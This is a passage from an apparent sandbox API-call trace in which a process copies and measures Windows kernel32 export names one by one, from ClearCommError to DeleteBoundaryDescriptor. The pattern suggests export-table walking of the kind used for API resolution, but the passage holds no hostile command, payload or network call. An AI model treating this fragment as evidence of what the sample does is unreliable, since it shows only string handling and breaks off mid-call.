lpString1="ClearCommError") returned="ClearCommError" [0080.223] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.223] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.223] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.223] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.223] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.223] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.223] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.223] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.223] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.223] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.223] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.223] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.223] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.223] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.223] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.223] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.224] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.224] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.224] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.224] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.224] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.224] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.224] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.224] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.224] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.224] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.224] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.224] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.224] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.224] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.224] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.224] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.224] lstrlenA (lpString="COPYFILEA") returned 9 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.224] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.224] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.225] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.225] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.225] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.225] lstrlenA (lpString="COPYFILEW") returned 9 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.225] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.225] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.225] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.225] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.225] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.225] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.225] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.225] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.225] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.225] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.225] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.225] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.225] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.225] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.225] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.226] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.226] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.226] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.226] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.226] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.226] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.226] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.226] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.226] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.226] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.226] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.226] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.226] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.226] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.226] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.226] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.226] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.226] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.226] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.227] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.227] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.227] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.227] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.227] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.227] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.227] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.227] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.227] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.227] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.227] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.227] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.227] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.227] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.227] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.227] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.227] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.227] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.227] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.228] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.228] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.228] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.228] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.228] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.228] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.228] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.228] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.228] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.228] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.228] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.228] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.228] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.228] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.228] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.228] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.228] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.229] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.229] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.229] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.229] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.229] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.229] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.229] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.229] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.229] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.229] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.229] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.229] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.229] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.229] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.229] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.229] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.229] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.229] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.229] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.230] lstrlenA (lpString="DELETEATOM") returned 10 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") 